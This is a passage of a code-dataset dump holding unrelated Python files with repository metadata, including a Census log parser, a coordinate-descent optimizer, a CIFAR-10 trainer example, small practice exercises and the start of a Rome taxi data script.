\"tl1qe\": {\n \"start\": \"total_L1 query L1 error for each geolevel\",\n \"stop\": \"INFO: (CUI//SP-CENS) County\"\n },\n \"val1qe\": {\n \"start\": \"votingage_L1 query L1 error for each geolevel\",\n \"stop\": \"INFO: (CUI//SP-CENS) County\"\n },\n \"state_query_props\": {\n \"start\": \"Sending dp_query_prop to Curve\",\n \"stop\": \"State:\"\n },\n \"county_query_props\": {\n \"start\": \"Sending dp_query_prop to Curve\",\n \"stop\": \"County:\"\n }\n }\n\n # identifying strings where we're looking for a value that will be on the same line as the identifying string\n self.single_line = {\n \"global_scale\": \"INFO: Global scale\",\n \"total_budget\": \"INFO: Total budget\",\n \"spine\": \"SPINE=\",\n \"strategy\": \"Setting STRATEGY\",\n \"geolevel_props\": \"Setting GEOLEVEL_BUDGET_PROP\",\n \"schema_keyword\": \"INFO: schema keyword\",\n \"us_v_pr\": \"config=\"\n }\n\n\ndef get_files_list(stdouts=[], cluster_steps=[], zips=[]):\n DASHBOARD_URL=census_getenv(\"DAS_DASHBOARD_URL\")\n stdouts += [f\"{DASHBOARD_URL}/app/logs/zip/contents/{t[0]}/steps/{t[1]}/stdout.gz\"\n for t in cluster_steps]\n stdouts = [string.replace(f\"{DASHBOARD_URL}/app/logs/zip/contents/\", DAS_S3ROOT + \"-logs/\")\n for string in stdouts]\n\n zips = [string.replace(f\"{DASHBOARD_URL}/app/s3/zip/download\", DAS_S3ROOT) for string in zips]\n\n return stdouts + zips\n\n\ndef get_files(files, stdouts_dir, outfile_prefix):\n \"\"\"\n get files by filenames from s3, move to stdouts dict, and cleanup\n :param files:\n :param stdouts_dir:\n :param outfile_prefix:\n :return: nothing\n \"\"\"\n # grab files from s3, put in a stdouts dir, and delete original file(s)\n subprocess.run([\"mkdir\", stdouts_dir])\n subprocess.run([\"mkdir\", \"zips\"])\n buckets_keys = [s3.get_bucket_key(file) for file in files]\n for i, filename in enumerate(files):\n # TODO: handle get file error\n print(\"getting file\", i + 1)\n s3.get_object(buckets_keys[i][0], buckets_keys[i][1], filename.split(\"/\")[-1])\n if filename[-3:] == \".gz\":\n subprocess.run([\"gunzip\", 'stdout.gz'])\n subprocess.run(['mv', 'stdout', f'{outfile_prefix}{i}'])\n elif filename[-4:] == \".zip\":\n file_name = filename.split(\"/\")[-1][:-4]\n subprocess.run([\"unzip\", file_name + \".zip\", \"-d\", \"./zips\"])\n subprocess.run([\"mv\", \"./zips/\" + file_name + \".stdout\", f'{outfile_prefix}{i}'])\n subprocess.run([\"rm\", file_name + \".zip\"])\n subprocess.run([\"rm\", \"-rf\", \"./zips\"])\n\n\ndef parse_stdout(name, id_strs):\n \"\"\"\n Read and parse the stdout file given by name, return lines of interest\n :param name: name of file to read\n :return: list of relevant lines, unformatted (epsilon lines bunched together\n \"\"\"\n # TODO grab spine, strategy, budgets, etc.\n with open(name) as file:\n lines = file.readlines()\n ret_lines = {}\n\n for i, line in enumerate(lines):\n # get multiline with start/stop strings\n for id in id_strs.multiline:\n if id not in ret_lines and id_strs.multiline[id][\"start\"] in line:\n print(\"\\t\", id, \"START\")\n lines_str = \"\"\n j = i\n while id_strs.multiline[id][\"stop\"] not in lines[j] and j < i + 100:\n lines_str += \" \" + lines[j].strip()\n j += 1\n if j < i + 100:\n print(\"\\t\", id, \"DONE\")\n lines_str += \" \" + lines[j].strip() + \" \" + lines[j + 1].strip()\n ret_lines[id] = lines_str\n # get multilines of defined size\n for id in id_strs.n_lines_directly_below:\n if id not in ret_lines and id_strs.n_lines_directly_below[id][\"start\"] in line:\n print(\"\\t\", id, \"START\")\n lines_str = \"\"\n for j in range(id_strs.n_lines_directly_below[id][\"n\"]):\n lines_str += \" \" + lines[i + j].strip()\n print(\"\\t\", id, \"STOP\")\n ret_lines[id] = lines_str\n # get single lines where we're looking for a value from a line below\n for id in id_strs.single_line_below:\n if id not in ret_lines and id_strs.single_line_below[id][\"start\"] in line:\n print(\"\\t\", id, \"START\")\n j = i\n found = False\n while not found and j < i + 100:\n if id_strs.single_line_below[id][\"stop\"] in lines[j]:\n print(\"\\t\", id, \"DONE\")\n ret_lines[id] = lines[j].strip()\n found = True\n j += 1\n # get single lines\n for id in id_strs.single_line:\n if id not in ret_lines and id_strs.single_line[id] in line:\n print(\"\\t\", id, \"DONE\")\n ret_lines[id] = line.strip()\n\n return ret_lines\n\n\ndef format_parsed_stdout(parsed_stdout):\n \"\"\"\n from the parsed lines, isolate only the relevant information and return in dict form\n :param parsed_stdout: dict of parsed-out lines from stdout\n :return: dict of relevant data from stdout\n \"\"\"\n values = {}\n # get votingage_l1 query error\n if \"val1qe\" in parsed_stdout:\n values[\"val1qe\"] = float(parsed_stdout['val1qe'].split()[-2])\n # get total_l1 query error\n if \"tl1qe\" in parsed_stdout:\n values[\"tl1qe\"] = float(parsed_stdout['tl1qe'].split()[-2])\n # get single attr/dim epsilons\n if \"eps_single\" in parsed_stdout:\n split = parsed_stdout[\"eps_single\"].split()\n key = None\n for i, word in enumerate(split):\n if word == \"attr/dim\":\n key = split[i + 1]\n elif word == \"(approx\":\n val = split[i + 1]\n if key is not None:\n values[key] = float(val[:val.find(')')])\n key = None\n # get geoelevel semantics\n if \"eps_gl\" in parsed_stdout:\n split = parsed_stdout[\"eps_gl\"].split()\n key = None\n for i, word in enumerate(split):\n if word == \"protecting\":\n key = \"_\".join([split[i + j] for j in range(1,4)]).strip(\",\")\n elif word == \"(approx\":\n val = split[i + 1]\n if key is not None:\n values[key] = float(val[:val.find(')')])\n key = None\n if \"gp\" in parsed_stdout:\n split = parsed_stdout[\"gp\"].split(\"INFO: ########################################\")\n for line in split:\n if len(line) > 100:\n key = line[line.find(\")\")+1:line.find(\"[\")]\n key = key.split()\n if key[1] == \"gqlevels\":\n key = key[0] + \"_\" + key[1]\n elif key[1] == \"geounit\":\n key = \"_\".join([key[i] for i in range(3)])\n else:\n key = key[0] + \"_\" + key[3]\n values[key] = line[line.find(\"[\"):line.find(\"]\")+1]\n if \"vacant\" in parsed_stdout:\n split = parsed_stdout[\"vacant\"].split(\"INFO: ########################################\")\n for line in split:\n if len(line) > 100:\n key = line[line.find(\")\")+1:line.find(\"[\")]\n key = key.split()\n if key[1] == \"vacant_count\":\n key = key[0] + \"_\" + key[1]\n elif key[1] == \"geounit\":\n key = \"_\".join([key[i] for i in range(3)])\n values[key] = line[line.find(\"[\"):line.find(\"]\")+1]\n if \"global_scale\" in parsed_stdout:\n split = parsed_stdout[\"global_scale\"].split(\":\")\n values[\"global_scale\"] = split[-1]\n if \"total_budget\" in parsed_stdout:\n split = parsed_stdout[\"total_budget\"].split(\":\")\n values[\"total_budget\"] = split[-1]\n if \"spine\" in parsed_stdout:\n split = parsed_stdout[\"spine\"].split(\"=\")\n values[\"spine\"] = split[-1]\n if \"strategy\" in parsed_stdout:\n split = parsed_stdout[\"spine\"].split(\"=\")\n values[\"strategy\"] = split[-1]\n if \"geolevel_props\" in parsed_stdout:\n split = parsed_stdout[\"geolevel_props\"].split(\"=\")\n values[\"geolevel_props\"] = split[-1]\n if \"schema_keyword\" in parsed_stdout:\n split = parsed_stdout[\"schema_keyword\"].split(\":\")\n values[\"schema_keyword\"] = split[-1]\n if \"us_v_pr\" in parsed_stdout:\n split = parsed_stdout[\"us_v_pr\"].split(\"/\")\n values[\"us_v_pr\"] = split[-1].strip(\".ini\")\n if \"output_files\" in parsed_stdout:\n split = parsed_stdout[\"output_files\"].split()\n for word in split:\n if word[:5] == \"s3://\" and word[-1] == \"/\":\n values[\"blocknodedicts\"] = word\n elif word[:5] == \"s3://\" and word[-4:] == \".txt\":\n values[\"mdf_location\"] = word\n if \"state_query_props\" in parsed_stdout:\n split = parsed_stdout[\"state_query_props\"].split(\"\\t\")\n values[\"state_query_props\"] = split[-1]\n if \"county_query_props\" in parsed_stdout:\n split = parsed_stdout[\"county_query_props\"].split(\"\\t\")\n values[\"county_query_props\"] = split[-1]\n\n\n return values\n\n\nif __name__ == \"__main__\":\n\n # define stdout filenames. example:\n # \"https://{HOST_NAME}/app/logs/zip/contents/j-18WF1XUP180X0/steps/s-38VEY96CEUZZ8/stdout.gz\",\n\n stdouts = [\n ]\n\n # define cluster/step pairs\n cluster_steps = [\n (\"j-3EQEINWCN0Q2K\", \"s-2JDH93P5LFH53\"),\n (\"j-KW5IBQ6YE8DK\", \"s-2S0544SVNOZST\"),\n (\"j-BGLWB6OHR9GH\", \"s-15BGHZIEUY6B1\"),\n (\"j-21YJXSJCGFIO7\", \"s-O3LCLQK4RFLD\"),\n (\"j-3M8OV4HUBVFKS\", \"s-2I4AWU87FTQA2\"),\n (\"j-3M8OV4HUBVFKS\", \"s-1LDK2RW45W720\"),\n (\"j-3M8OV4HUBVFKS\", \"s-313ZLKMRATZB3\"),\n (\"j-3M8OV4HUBVFKS\", \"s-EQQGGKIS093W\"),\n (\"j-2232JSFR0WE0Z\", \"s-CFF2PGI5MQ71\")\n ]\n\n # define zip files to get. example:\n # \"https://{HOST_NAME}/app/s3/zip/download/rpc/upload/logs/DAS-2021-04-09_1042_PLUCKY_ASPECT.zip\",\n zips = [\n ]\n\n # get appropriate urls\n files = get_files_list(stdouts, cluster_steps, zips)\n\n # get identifying strings for stdout\n id_strs = IdentifyingStrings()\n\n # get files from s3\n stdouts_dir = \"stdouts\"\n outfile_prefix = f\"./{stdouts_dir}/stdout-\"\n get_files(files, stdouts_dir, outfile_prefix)\n\n # parse files\n parsed_lines = {}\n for i, filename in enumerate(files):\n stdoutname = f\"{outfile_prefix}{i}\"\n print(filename)\n parsed_lines[filename] = parse_stdout(stdoutname, id_strs)\n\n print(\"~~~~\")\n\n # get captured columns (and resulting types) for each file\n for filename, results_dict in parsed_lines.items():\n print(filename)\n for attr, value in results_dict.items():\n print(\"\\t\", attr, type(value))\n\n print(\"~~~~~\")\n\n # get formatted parsed lines or each file\n final_data = {}\n for filename, results_dict in parsed_lines.items():\n values = format_parsed_stdout(results_dict)\n values[\"filename\"] = filename\n final_data[filename] = values\n\n # make default value dictionary for all expected columns\n csv_columns_l = [\n \"filename\", \"spine\", \"strategy\", \"schema_keyword\", \"us_v_pr\",\n \"global_scale\", \"total_budget\", \"geolevel_props\",\n \"state_query_props\", \"county_query_props\",\n \"blocknodedicts\", \"mdf_location\",\n \"hispanic\", \"cenrace\", \"votingage\", \"hhgq\",\n \"Block_within_Block_Group\", \"Block_within_Tract\", \"Block_within_County\", \"Block_within_State\", \"Block_within_US\",\n \"OSE_hispanic\", \"Block_Group_hispanic\", \"Place_hispanic\",\n \"OSE_gqlevels\", \"Block_Group_gqlevels\", \"Place_gqlevels\",\n \"OSE_vacant_count\", \"Block_Group_vacant_count\", \"Place_vacant_count\",\n \"OSE_geounit_counts\", \"Block_Group_geounit_counts\", \"Place_geounit_counts\",\n \"val1qe\", \"tl1qe\"]\n\n # go through results dictionaries and add any unanticipated columns\n csv_columns = {key: \"\" for key in csv_columns_l}\n for filename, results_dict in final_data.items():\n for key in results_dict:\n if key not in csv_columns:\n print(f\"\\tUNANTICIPATED COLUMN: {key}\")\n csv_columns[key] = ''\n\n # write csv\n with open(\"captured_data.csv\", 'w') as csvfile:\n writer = csv.DictWriter(csvfile, delimiter=\";\", fieldnames=csv_columns)\n writer.writeheader()\n for filename, results_dict in final_data.items():\n writer.writerow(results_dict)\n\n # delete local files\n subprocess.run([\"rm\", \"-rf\", f\"./{stdouts_dir}/\"])\n","repo_name":"uscensusbureau/DAS_2020_DHC_Production_Code","sub_path":"das_decennial/scripts/parse_stdout.py","file_name":"parse_stdout.py","file_ext":"py","file_size_in_byte":15328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31874688395","text":"import numpy as np\nfrom .loss import *\n\nclass Coordinate_Based_Optimizers:\n\n\tdef __init__(self,learning_rate,epsilon,max_iters):\n\n\t\tself.gamma = learning_rate\n\t\tself.epsilon = epsilon\n\t\tself.max_iters = max_iters\n\n\t\n\tdef uniform_random_sampling(self,weight):\n\n\t\tdimension = weight.shape[0] # column vector\n\t\treturn int(np.random.uniform(0,dimension))\n\n\tdef importance_sampling(self,weight,coordinate_smoothness):\n\n\t\tdimension = weight.shape[0]\n\t\tpossible_coordinates = np.arange(0,dimension)\n\t\tprobabilities = coordinate_smoothness / np.sum(coordinate_smoothness)\n\t\treturn int(np.random.choice(possible_coordinates,p= probabilities)) \n\n\tdef steepest_coordinate(self,gradient):\n\n\t\treturn np.argmax(gradient)\n\t\n\t\n\tdef select_coordinate(self,vector,strategy,params):\n\n\t\tif strategy == 'random' :\n\t\t\treturn self.uniform_random_sampling(vector)\n\t\telif strategy == 'importance' :\n\t\t\treturn self.importance_sampling(vector,params[0])\n\t\telif strategy == 'steep':\n\t\t\tif params[1] == 0:\n\t\t\t\treturn self.uniform_random_sampling(vector)\n\t\t\telse:\n\t\t\t\tlast_gradient = (params[2])[len(params[2]) - 1]\n\t\t\t\treturn self.steepest_coordinate(last_gradient)\n\t\telse :\n\t\t\traise ValueError('Method not supported')\n\n\tdef coordinate_descent(self,A,b,strategy,params):\n\n\t\tlosses = []\n\t\tprevious_gradients = []\n\t\titerator = 0\n\t\tweight = np.zeros((A.shape[1],1))\n\t\twhile iterator < self.max_iters:\n\n\t\t\tindex = self.select_coordinate(weight,strategy,(params,iterator,previous_gradients))\n\t\t\t\n\t\t\tdata_coordinate = (A[:,index]).reshape((-1,1))\n\t\t\tbias_coordinate = b[index]\n\t\t\tweight_coordinate = weight[index]\n\t\t\tgradient = first_order_least_squares(data_coordinate,weight_coordinate,bias_coordinate)\n\t\t\t\n\t\t\tbasis_vector = np.zeros_like(weight)\n\t\t\tbasis_vector[index] = 1\n\t\t\tcoordinate_wise_gradient = np.dot(basis_vector,gradient)\n\t\t\t\n\t\t\tprevious_gradients.append(gradient)\n\t\t\tweight = weight - self.gamma * gradient\n\t\t\tcurrent_loss = least_squares_loss(A,weight,b)\n\t\t\tlosses.append(current_loss)\n\t\t\titerator += 1\n\t\t\t\n\n\t\treturn weight,losses\n\n\n\n","repo_name":"okm02/ML-Optimization-Algorithms","sub_path":"optimizers/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7112294078","text":"\"\"\"\nTrainer Example\n================================\n\nThis example should illustrate how to use the trainer class.\n\n\"\"\"\n\nimport torch.nn as nn\nfrom inferno.io.box.cifar import get_cifar10_loaders\nfrom inferno.trainers.basic import Trainer\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.extensions.layers import ConvELU2D\nfrom inferno.extensions.layers import Flatten\nfrom inferno.utils.python_utils import ensure_dir\n\nfrom inferno.extensions.layers import SELU\n\n##################################################\n# change directories to your needs\nLOG_DIRECTORY = ensure_dir('log')\nSAVE_DIRECTORY = ensure_dir('save')\nDATASET_DIRECTORY = ensure_dir('dataset')\n\n##################################################\n# shall models be downloaded\nDOWNLOAD_CIFAR = True\nUSE_CUDA = True\n\n##################################################\n# Build torch model\nmodel = nn.Sequential(\n ConvELU2D(in_channels=3, out_channels=256, kernel_size=3),\n nn.MaxPool2d(kernel_size=2, stride=2),\n ConvELU2D(in_channels=256, out_channels=256, kernel_size=3),\n nn.MaxPool2d(kernel_size=2, stride=2),\n ConvELU2D(in_channels=256, out_channels=256, kernel_size=3),\n nn.MaxPool2d(kernel_size=2, stride=2),\n Flatten(),\n nn.Linear(in_features=(256 * 4 * 4), out_features=10),\n nn.Softmax()\n)\n\n##################################################\n# data loaders\ntrain_loader, validate_loader = get_cifar10_loaders(DATASET_DIRECTORY,\n download=DOWNLOAD_CIFAR)\n\n##################################################\n# Build trainer\ntrainer = Trainer(model)\ntrainer.build_criterion('CrossEntropyLoss')\ntrainer.build_metric('CategoricalError')\ntrainer.build_optimizer('Adam')\ntrainer.validate_every((2, 'epochs'))\ntrainer.save_every((5, 'epochs'))\ntrainer.save_to_directory(SAVE_DIRECTORY)\ntrainer.set_max_num_epochs(10)\ntrainer.build_logger(TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every='never'), \n log_directory=LOG_DIRECTORY)\n\n##################################################\n# Bind loaders\ntrainer.bind_loader('train', train_loader)\ntrainer.bind_loader('validate', validate_loader)\n\n##################################################\n# activate cuda\nif USE_CUDA:\n trainer.cuda()\n\n##################################################\n# fit\ntrainer.fit()\n","repo_name":"inferno-pytorch/inferno","sub_path":"examples/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"54"} +{"seq_id":"3281330582","text":"# 문제 풀이 시작 : 2021-10-27 20:20\n# 문제 풀었는지? : YES / NO\n# 문제를 풀었을 때 : 두 문제 중 왜 이 문제를 골랐는지?\n# 문제를 풀지 못 했을 때 : 구하고자 하는 문제의 조건, input, output 제대로 이해하기, 어떻게 풀려고 노력했는지?\n# 알아야 할 기본 개념? :\n\ndef make_road(arr, x):\n check_list = [0, 0] # 오르막, 내리막 체크\n for i in range(1, len(arr)):\n # 오르막길일 때\n if arr[i] > arr[i-1]:\n if check_list[1] == 0:\n check_list[0] += 1\n if i != 1:\n if arr[i-2] > arr[i-1]:\n if check_list[1] >= x:\n check_list[1] = 0\n continue\n else:\n return 0\n else:\n continue\n\n\n # 내리막길일 때\n elif arr[i] < arr[i-1]:\n if check_list[0] == 0:\n check_list[1] += 1\n if i != 1:\n if arr[i-2] < arr[i-1]:\n if check_list[0] >= x:\n check_list[0] = 0\n continue\n else:\n return 0\n else:\n continue\n\n\n # 직진이면?\n elif arr[i] == arr[i-1]:\n continue\n\n return 1\n\nimport sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n N, X = map(int, input().split()) # N: 지도 한 변의 크기, X: 경사로의 길이\n mountain = [list(map(int, input().split())) for _ in range(N)]\n cnt = 0\n for i in range(N):\n cnt += make_road(mountain[i], X)\n mountain = list(map(list, zip(*mountain)))\n print(mountain)\n for j in range(N):\n cnt += make_road(mountain[i], X)\n print(cnt)","repo_name":"kellyjung5512/TIL","sub_path":"03_review_study/swea/4014/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7930377012","text":"import os\nimport sys\nimport shutil\nimport subprocess\nfrom timeit import timeit\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nbuild_tools_dir = os.path.abspath(os.path.join(scripts_dir, os.pardir))\nroot_dir = os.path.abspath(os.path.join(build_tools_dir, os.pardir))\nbuild_dir = os.path.join(root_dir, \"build\")\nbin_dir = os.path.join(build_dir, \"bin\")\ngenerator = \"Visual Studio 15 2017 Win64\"\ncmake_base_command = [\"cmake\"]\ncmake_generator_args = [\"-G\", generator]\n\ndef change_dir_noexcept(path):\n try:\n os.chdir(path)\n except:\n os.chdir(root_dir)\n\ndef call_in_directory(dir, fn, *args, **kwargs):\n if not os.path.exists(dir):\n os.makedirs(dir)\n prevWorkingDir=os.getcwd()\n os.chdir(dir)\n try:\n return fn(*args, **kwargs)\n finally:\n change_dir_noexcept(prevWorkingDir)\n\ndef run_cmake_command(args):\n command = cmake_base_command.copy()\n command.extend(args)\n call_in_directory(build_dir, subprocess.check_call, command, stderr=subprocess.STDOUT, shell=True)\n\ndef delete_build():\n if os.path.exists(build_dir) :\n call_in_directory(root_dir, shutil.rmtree, build_dir, ignore_errors=True)\n\ndef generate_project(options):\n command = cmake_generator_args.copy()\n command.append(root_dir)\n command.extend(options)\n run_cmake_command(command)\n\ndef build_project(target=\"ALL_BUILD\", config=\"Release\"):\n command = cmake_base_command.copy()\n command.extend([\"--build\", build_dir])\n command.extend([\"--target\", target])\n command.extend([\"--config\", config])\n call_in_directory(build_dir, subprocess.check_call, command, stderr=subprocess.STDOUT, shell=True)\n\ndef run_executable(name, args = [], runs = 1):\n subprocess_args = [name]\n subprocess_args.extend(args)\n stmt_str = \"subprocess.check_call({0}, stderr=subprocess.STDOUT, shell=True)\".format(subprocess_args)\n runtime_dir = bin_dir\n return call_in_directory(runtime_dir, timeit, stmt = stmt_str, setup = \"import subprocess\", number=runs)\n","repo_name":"Sunday111/kpi-prog_basics_labs","sub_path":"BuildTools/Python/build_tools.py","file_name":"build_tools.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3460086457","text":"# Given two strings, check if they’re anagrams or not.\n\ndef isAnagram (str1, str2):\n a = ''.join(sorted(str1.lower()))\n b = ''.join(sorted(str2.lower()))\n if a == b:\n print(\"anagram\")\n else:\n print(\"not anagram\")\n \n# test\nisAnagram(\"hello\", \"ol4hel\");\n","repo_name":"JoyceMiryamH/codingPractiqueQs","sub_path":"python/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5715046214","text":"# Initial food sources are produced for all employed bees\n# REPEAT:\n# Each employed bee goes to a food source in her memory and determines a closest source, then evaluate its nectar\n# amount and dances in the hive\n# Each onlooker watches the dance of the employed bees and chooses one of their sources depending on the dances,\n# and goes to that source. After choosing a neighbour around that, she evaluates its nectar amount\n# Abandoned food sources are determined and replaced with the new food sources discovered by scouts\n# The best\n\nS_N = 10 # Amount of foods\nlimit = 10 # Maximum number of trials before abandoning a source\nMFE = 10 # Maximum number of fitness evaluations\n\nnum_evaluations = 0\n\ndef random_food_source(s): # Produce initial food sources randomly within the range of the boundaries of the parameters\n\n return 0\n\n\n# Blah blah blah.\n\n# What is f(x)?\n#\n\nX = list()\nf = list()\ntrials = list()\n\nfor s in range(S_N):\n\n r = random_food_source(s)\n\n X.append(r) # Random solution\n f.append(r)\n trials.append(0) # This is the number of times that we've examined this food source, I believe.\n\n num_evaluations += 1\n\nfor s in range(S_N):\n\n x = 0 # A new solution produced by equation 2\n\n# I will, infact, just steal this pseudo code.\n# It's a lot easier.\n# I just have to understand how the thing works.\n\n\n\n\n# Nice. Here's some thorough pseudo-code.\n# I'll convert it into my OWN code, and then I'll be in good stead to write it myself.\n\n# void init(int index)\n# begin\n# fitness[index] = CalculateFitness(f[index])\n# trial[index] = 0\n# end\n\n# void SendScoutBees()\n\n# begin\n# if (trial[maxTrialIndex] >= limit) then\n# init(maxTrialIndex)\n# end\n# end\n\n\n# Generate a randomly distributed initial population of S_n solutions.\n\n","repo_name":"PrismaticPolygon/AlternativeComputing","sub_path":"abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24293415545","text":"#\n# @lc app=leetcode id=1138 lang=python3\n#\n# [1138] Alphabet Board Path\n#\n\n# @lc code=start\nclass Solution:\n def alphabetBoardPath(self, target: str) -> str:\n\n get_pos = lambda chr: ord(chr) - 97\n\n commands = []\n curr = 0\n for chr in target:\n pos = get_pos(chr)\n dy = pos // 5 - curr // 5\n dx = pos % 5 - curr % 5\n if dy > 0:\n commands.append(('R' if dx > 0 else 'L') * abs(dx))\n commands.append('D' * dy)\n else:\n commands.append('U' * abs(dy))\n commands.append(('R' if dx > 0 else 'L') * abs(dx))\n \n commands.append('!')\n curr = pos\n return ''.join(commands)\n\n# @lc code=end\n\nfrom util import test_local\ntest_local(Solution().alphabetBoardPath, \"leet\", \"code\", \"xzx\")","repo_name":"Clevin49958/Leetcode","sub_path":"1138.alphabet-board-path.py","file_name":"1138.alphabet-board-path.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36514171681","text":"'''\nСрез. Напишите код, который все элементы массива\n\nx с четными индексами переставит в обратном порядке.\n\nТ.е. если x = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9], то код должен\n\nсформировать [8, 1, 6, 3, 4, 5, 2, 7, 0, 9].\n\nreplace\n\nЗамена каждого следующего элемента массива на не чётное\n'''\n\n\n\n\n\nlist = []\nfor i in range(10):\n\tlist.append(i)\n\t'''\n\tif(i % 2 != 0):\n\t\tne.append(i)\n\tif(i % 2 == 0):\n\t\tch.append(i)\n\tlist = ne + ch\n\t'''\n\t\n'[1, 3, 5, 7, 9, 0, 2, 4, 6, 8]'\n\nlist[::2] = list[::2][::-1]\nprint(list)\n\n'''\nprint(ne)\nprint(ch)\nprint(list)\nprint(arr)\n'''\n\n'''\nif(x[i] % 2 != 0):\n\tlist = list(x[i])\n\tlist.replace(ne, ch)\nprint(x)\n\t\n'''\n\n\n\t\n\t\n","repo_name":"Sinsjar/-","sub_path":"Work_1_Done/3.3.5.py","file_name":"3.3.5.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4851916796","text":"# 1.1. Вывести на одной строке числа 31, 18 и 79 с одним пробелом между ними. Текст '31 18 79' не использовать.\n\n# Easter egg. Операция конкатенации\n\n# Ввод данных. Присвоение значений переменным вариант 1.\na = 31\nb = 18\nc = 79\n# Ввод данных. Присвоение значений переменным, используя список вариант 2.\n# a, b, c = [31, 18, 79]\n\n# Answer v.1.\nd = str(a)\ne = str(b)\nf = str(c)\nresult = d + \" \" + e + \" \" + f\nprint(\"Answer 1: \", result)\n\n# Answer v.2.\nresult = str(a) + \" \" + str(b) + \" \" + str(c)\nprint(\"Answer 2: \", result)\n\n# Answer v.3.\nprint(\"Answer 3: \", str(a) + \" \" + str(b) + \" \" + str(c))\n\n\n# Answer v.4.\n# Используя функцию concatenate()\ndef concatenate(x: int, y: int, z: int) -> str:\n return str(x) + \" \" + str(y) + \" \" + str(z)\n\n\nprint(\"Answer 4: \", concatenate(a, b, c))\n","repo_name":"r-oleg-official/1440_tasks_python","sub_path":"1.1.py","file_name":"1.1.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8279622336","text":"# Question 10: Define a 3 x 3 square matrix, Extract the main diagonal as vector.\r\n# Create diagonal matrix from that extracted vector \r\nimport numpy as np\r\n\r\ndef MatrixMaker(rows, columns):\r\n a = [int(input(\"=>\")) for i in range(rows * columns)]\r\n a = np.array(a)\r\n a = a.reshape(rows, columns)\r\n return a\r\n\r\nrows = 3\r\ncolumns = 3\r\n\r\nprint(f\"Enter the elements of the {rows}x{columns} matrix\")\r\nmatrix_1 = MatrixMaker(rows, columns)\r\n\r\n# extracting vector and making diagonal matrix\r\ndiagonalMatrix = [] \r\n\r\n#extracting vector using loop that only iterates the diagonal elements \r\nvector = [matrix_1[i][j] for i, j in zip(range(rows) ,range(columns))]\r\nvector = np.array(vector) #converting to vector\r\n\r\n#making diagonal matrix using vector\r\nfor i in range(rows):\r\n for j in range(columns):\r\n if i == j : diagonalMatrix.append(vector[i]) \r\n else : diagonalMatrix.append(0)\r\n#You can use a single line code for making diagonal matrix \r\n#diagonalMatrix = [matrix[i][j] if i==j else 0 for i, j in [(i, j) for i in range(rows) for j in range(columns)]] \r\ndiagonalMatrix = np.array(diagonalMatrix)\r\ndiagonalMatrix = diagonalMatrix.reshape(rows, columns)\r\n\r\n#printing all values\r\nprint(\"Matrix \\n\", matrix_1)\r\nprint(\"Vector \\n\",vector)\r\nprint(\"Diagonal Matrix \\n\",diagonalMatrix)","repo_name":"ChristyBinu-4/Lab-assignments","sub_path":"1st Sem/mathematics/Set 2/Set2-10.py","file_name":"Set2-10.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25222132665","text":"\"\"\"\nslightly more efficient 'chunker.py' script\npc0179 on the Kboard\npython 3+ throughout\n\n1. load basic/raw csv file\n2. filter duplicates\n3. add intelligent columns (later for database)\n4. output - csv or straight to db?\n\n5. once in db...\n- drop rows outside of bbox?\n- take average of rows with identical time_stamps...\n- some estimate of (instant?) velocity\n\n\"\"\"\n\nimport pandas as pd\nimport datetime as DT\nimport numpy as np\nimport RomeTaxiGlobalVars as RTGV\nimport re\n\n\n#--------------------------\n# Temporal funcs...\n\nglobal sim_start_time\nsim_start_time = DT.datetime.strptime(RTGV.sim_start_time, '%Y-%m-%d %H:%M:%S')\n\n\ndef PyDateTimeConv(csv_time):\n\tchopped_csv_time = csv_time[:-3]\n\tif len(chopped_csv_time)<20:\n\t\tpy_time = DT.datetime.strptime(chopped_csv_time,'%Y-%m-%d %H:%M:%S')\n\telse:\n\t\tpy_time_ms = DT.datetime.strptime(chopped_csv_time,'%Y-%m-%d %H:%M:%S.%f')\n\t\tpy_time = RoundTimeSeconds(py_time_ms)\n\treturn py_time\n\ndef RoundTimeSeconds(some_DT_obj):\n\tif some_DT_obj.microsecond>= 5e5:\n\t\tsome_DT_obj = some_DT_obj + DT.timedelta(seconds=1)\n\treturn some_DT_obj.replace(microsecond=0)\n\ndef SimuTime(some_DT_obj):\n#\tsim_start_time = '2014-02-01 00:00:00'\n\t#if sim_start_time == None:\n\t#\tsim_start_time =\n\tglobal sim_start_time\n\tsim_time_s = (some_DT_obj-sim_start_time).total_seconds()\n\tsim_daynum = (some_DT_obj-sim_start_time).days()\n\tsim_weekday = some_DT_obj.weekday()\n\treturn sim_time_s,sim_daynum,sim_weekday\n\ndef SimDayNum(some_DT_obj):\n\tglobal sim_start_time\n\t#sim_daynum = (some_DT_obj-sim_start_time).days()\n\tsim_daynum = some_DT_obj.day - sim_start_time.day\n\t# since 